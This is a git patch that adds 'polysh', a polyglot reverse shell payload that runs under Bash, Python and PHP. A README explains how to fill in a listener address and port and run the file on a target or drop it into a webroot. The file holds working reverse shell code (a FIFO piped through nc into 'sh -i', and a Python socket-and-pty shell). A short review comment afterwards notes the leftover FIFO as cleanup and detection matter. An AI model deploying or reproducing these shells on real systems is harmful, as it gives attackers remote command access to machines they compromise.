From 32e3975f7e0ebc622f579c77cb6a19909f5a4633 Mon Sep 17 00:00:00 2001
From: maride
Date: Sat, 1 Nov 2025 23:53:00 +0100
Subject: [PATCH] Add reverse shells, add README
---
README.md | 15 +++++++++++++++
poly | 16 ----------------
polysh | 19 +++++++++++++++++++
3 files changed, 34 insertions(+), 16 deletions(-)
create mode 100644 README.md
delete mode 100644 poly
create mode 100644 polysh
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..f774251
--- /dev/null
+++ b/README.md
@@ -0,0 +1,15 @@
+# polysh
+
+Polymorph reverse shell payload for Bash, Python, and PHP.
+
+## Use
+
+Replace `{{{ADDR}}}` and `{{{PORT}}}` according to your listener:
+- `sed -i "s/{{{ADDR}}}/10.0.0.42/g" polysh`
+- `sed -i "s/{{{PORT}}}/1337/g" polysh`
+
+After that, bring it onto your target system and either `bash polysh`, `python polysh` or `php polysh` it - or bring it into webroot and call it.
+
+## Credits
+
+Reverse shells taken from [revshells.com](https://www.revshells.com/), slightly modified for the poly magic.
diff --git a/poly b/poly
deleted file mode 100644
index ef2e73e..0000000
--- a/poly
+++ /dev/null
@@ -1,16 +0,0 @@
-# BASH
-"echo" "poc.sh"
-"exit" "1"
-
-# PYTHON
-import sys
-print("poc.py")
-sys.exit(1)
-"""
-
-# PHP
-
-"""
diff --git a/polysh b/polysh
new file mode 100644
index 0000000..ba43a7c
--- /dev/null
+++ b/polysh
@@ -0,0 +1,19 @@
+# BASH
+"declare" "tmpdir=$(mktemp -u)"
+"mkfifo" "$tmpdir"
+"bash" "-c" "cat $tmpdir|sh -i 2>&1|nc {{{ADDR}}} {{{PORT}}} >$tmpdir"
+"exit" "1"
+
+# PYTHON
+import sys, socket, os, pty
+s=socket.socket()
+s.connect(("{{{ADDR}}}", {{{PORT}}}))
+[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
+pty.spawn("sh")
+"""
+
+# PHP
+
+"""
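Review bot: The bash branch creates a named pipe that it never removes, and nothing in the file records that: `mktemp -u` only prints an unused name, `"mkfifo" "$tmpdir"` creates the pipe there with umask-dependent permissions, and `"exit" "1"` ends the script with the pipe still in place. Since that pipe feeds the `sh -i` input, it is both a leftover on the assessed host that has to be listed for cleanup and a detection artifact worth naming for defenders (a FIFO in the temp directory read by `cat` into `sh -i`, with `nc` writing to it). I would put a comment above the `"declare"` line, for example `# NOTE: leaves a FIFO at the mktemp -u path; not removed on exit - record and remove it after the test`. In the Python section `sys` is imported but not used in the visible lines. The PHP section's body is not visible in this hunk (the header counts 19 lines), so it is not covered here.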